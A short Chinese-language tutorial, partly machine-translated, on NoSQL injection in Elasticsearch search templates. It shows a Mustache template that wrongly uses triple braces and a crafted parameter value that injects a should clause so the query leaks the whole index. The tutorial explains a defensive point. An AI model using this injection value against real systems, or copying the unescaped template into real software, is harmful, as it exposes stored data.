使用Elasticsearch防止NoSQL注入

你可以找到所有的 previously detected security flaws 在ES中,但NoSQL注入从来都不是其中之一。。。目前为止

然而,你可以找到 some literature 这就是如何做到这一点。还有一些 other discussions and resources 也许值得一读。

举个简单的例子,当使用利用Mustache模板语言的搜索模板时,肯定有可能创建NoSQL注入攻击。例如,假设我们有以下两个文档:

PUT attack/doc/1
{
  "field1": 2,
  "field2": 1
}
PUT attack/doc/2
{
  "field1": 2,
  "field2": 2
}

field1 (错误地)使用了三重胡须:

POST _scripts/attack
{
  "script": {
    "lang": "mustache",
    "source": """
{
  "query": {
    "bool": {
      "filter": [
        {
          "term": {
            "field1": {{{field}}}
          }
        },
        {
          "range": {
            "field2": {
              "gte": 2
            }
          }
        }
      ]
    }
  }
}
    """
  }
}

通过为 field 参数,我们可以泄漏整个索引:

POST attack/_search/template
{
  "id": "attack",
  "params": {
    "field": "2}}],\"should\":[{\"range\":{\"field2\":{\"lte\":2}"
  }
}

最后的查询如下所示,即我们能够插入一个基本上泄露整个索引的should子句:

  {
    "query" : {
      "bool" : {
        "filter" : [
          {
            "term" : {
              "field1" : 2
            }
          }
        ],
        "should" : [
          {
            "range" : {
              "field2" : {
                "lte" : 2
              }
            }
          },
          {
            "range" : {
              "field2" : {
                "gte" : 2
              }
            }
          }
        ]
      }
    }
  }